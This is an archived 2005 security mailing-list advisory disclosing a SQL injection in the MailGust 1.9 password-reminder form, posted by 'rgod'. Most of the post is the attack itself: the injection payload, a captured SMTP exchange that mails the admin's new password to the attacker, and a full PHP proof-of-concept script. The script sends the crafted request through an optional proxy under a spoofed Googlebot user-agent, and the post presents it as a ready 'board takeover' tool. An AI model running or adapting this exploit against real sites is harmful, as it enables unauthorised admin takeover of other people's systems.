Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | MailGust 1.9 SQL Injection |
|---|---|
| Date: | 24 Sep 2005 16:55:24 -0000 |
MailGust 1.9 SQL injection / board takevor software: site: http://www.mailgust.org/ description: Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability: if magic quotes off -> SQL Injection without to have an account, a user can send himself a new admin password using password reminder, in email field type: [yuor_email],'or'a'='a'/*@hotmail.com give a look to what happen: 220 [MAILSERVER] SMTP Service ready HELO [MAILGUST] 250 [MAILSERVER]. MAIL FROM:<me@localhost.com> 250 MAIL FROM:<me@localhost.com> OK RCPT TO:<[your_email]> 250 RCPT TO:>[your_email] OK RCPT TO:<'or'a'='a'/*@hotmail.com> 250 RCPT TO:<'or'a'='a'/*@hotmail.com> OK DATA 354 Start mail input; end with <CRLF>.<CRLF> Date: Sat, 24 Sep 2005 16:11:38 +0100 Subject: New password To: [your_email],'or'a'='a'/*@hotmail.com From: systemxxx@localhost.com Your login name is: [admin_email] Your new password is: 4993587 Click here: http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114 to activate the password, than try to log in! It is recommended that you change your password afterwards. . 250 <4335105B00009AE2> Mail accepted QUIT 221 [MAILSERVER] QUIT vulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363: ... $query = "SELECT * FROM $applName"."_$userClassName ". "WHERE email='$this->email'"; ... it becomes: SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com' "or'a'='a'" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address, it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;) activate the password, now you can login with [admin_email] as user and new password this is my proof of concept exploit: <?php # mailgust_xpl.php # # # # MailGust 1.9 ( possibly prior versions) SQL Injection / board takeover # # poc exploit with generic HTTP proxy support # # by rgod # # site: http://rgod.altervista.org # # # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # send yourself a new admin password right now! # # # # Sun-Tzu: "Hence to fight and conquer in all your battles is not supreme # # excellence; a supreme excellence consists in breaking the enemy's # # resistance without fighting." # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<head><title>M a i l G u s t v.1.9 S Q L I n j e c t i o n</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type= "text/css"> <!-- body,td,th {color: #00FF00;} body {background-color: #000000;} .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head> <body> <p class="Stile6"> MailGust V 1.9 (possibly prior versions) SQL Injection / board takeover</p><p class="Stil e6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host= value&port=value&proxy=value&your_email=value"><p><input type="text" name="host"
<span class="Stile5"> hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"><span class="Stile5"> path ( ex: /mailgust/ or just / )
</span></p><p><input type="text" name="port" > <span class="Stile5"> specify
a port other than 80 ( default value ) </span> </p> <p> <input type="text"
name="your_email"> <span class="Stile5"> e-mail where MG will send the password
</span></p><p><input type="text" name="proxy"> <span class="Stile5">send exploit
through an HTTP proxy (ip:port)</span></p> <p><input type="submit "name="Submit"
value="go!"></p></form></td></tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo htmlentities($html);
}
function isemail($email)
{
$regex = '^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]{2,})+$';
if (eregi($regex, $email)) return true;
else return false;
}
if (($path<>'') and ($host<>'') and ($your_email<>''))
{
if ($port=='') {$port=80;}
$your_email=trim($your_email);
if (!isemail($your_email))
{
echo '<br> I am not MailGust! You have to give me a valid e-mail...<br><br>';
die;
}
$sql=$your_email.",'or'a'='a'/*@fakedomainname.com"; //wow it's a beautiful
query ;)
$data='-----------------------------7d52b21b210554
Content-Disposition: form-data; name="method"
remind_password
-----------------------------7d52b21b210554
Content-Disposition: form-data; name="list"
maillistuser
-----------------------------7d52b21b210554
Content-Disposition: form-data; name="fromlist"
maillist
-----------------------------7d52b21b210554
Content-Disposition: form-data; name="frommethod"
showhtmllist
-----------------------------7d52b21b210554
Content-Disposition: form-data; name="email"
'.$sql.'
-----------------------------7d52b21b210554
Content-Disposition: form-data; name="submit"
Ok
-----------------------------7d52b21b210554--';
if ($proxy=='')
{$packet="POST ".$path."index.php HTTP/1.1\r\n";}
else
{$packet="POST http://".$host.$path."index.php HTTP/1.1\r\n";}
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer:
http://".$host.$path."index.php?method=remind_password_form&list=maillistuser&fromlist=maillist&frommethod=showhtmllist\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d52b21b210554\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: globalUserId=1745493597; gustTimeOut=1\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
}
else
{
echo '<br>Fill in requested fields, optionally specify a proxy...<br><br>';
}
?>
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it
original advisory: http://rgod.altervista.org/maildisgust.html
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | AlstraSoft E-Friends Remote Command Exucetion, khc |
|---|---|
| Next by Date: | [SECURITY] [DSA 817-1] New python2.2 packages fix arbitrary code execution, joey |
| Previous by Thread: | AlstraSoft E-Friends Remote Command Exucetion, khc |
| Next by Thread: | [SECURITY] [DSA 817-1] New python2.2 packages fix arbitrary code execution, joey |
| Indexes: | [Date] [Thread] [Top] [All Lists] |